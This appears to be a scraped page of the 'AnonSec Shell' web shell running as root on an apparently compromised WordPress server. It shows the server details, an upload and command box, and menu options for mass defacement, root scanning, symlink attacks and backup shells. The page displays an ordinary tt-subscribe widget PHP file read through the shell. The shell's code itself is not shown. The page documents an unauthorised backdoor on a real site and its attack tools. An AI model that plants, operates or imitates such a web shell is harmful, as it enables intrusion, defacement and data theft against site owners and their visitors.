AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.118.207.25   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/chroot/var/www/wp-content/plugins/tt-subscribe/framework/widget/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/chroot/var/www/wp-content/plugins/tt-subscribe/framework/widget/settings.php
<?php  //tt_subscribe widget registration

// register widget
add_action('widgets_init', create_function('', 'return register_widget("tt_subscribe_widget");'));

class tt_subscribe_widget extends WP_Widget {
	
	public function __construct() {
		// widget actual processes
		parent::__construct(
	 		'tt_subscribe_widget', // Base ID
			'TT-Subscribe', // Name
			array( 'description' => __( 'Add TT-Subscribe to your site.', 'text_domain' ), ) );
	}

	public function widget($args, $instance) {
		// outputs the content of the widget
		  extract($args);
		  echo $before_widget;
		  tt_subscribe(); // call tt_subscribe function
		  echo $after_widget;
	}
	
	public function form($instance) {
		// outputs the options form on admin
		?>
		<p><?php _e( 'Click <a href="admin.php?page=tt-subscribe">here</a> to edit the settings.' ); ?></p>
		<?php 
	}
}
?>

Anon7 - 2022
AnonSec Team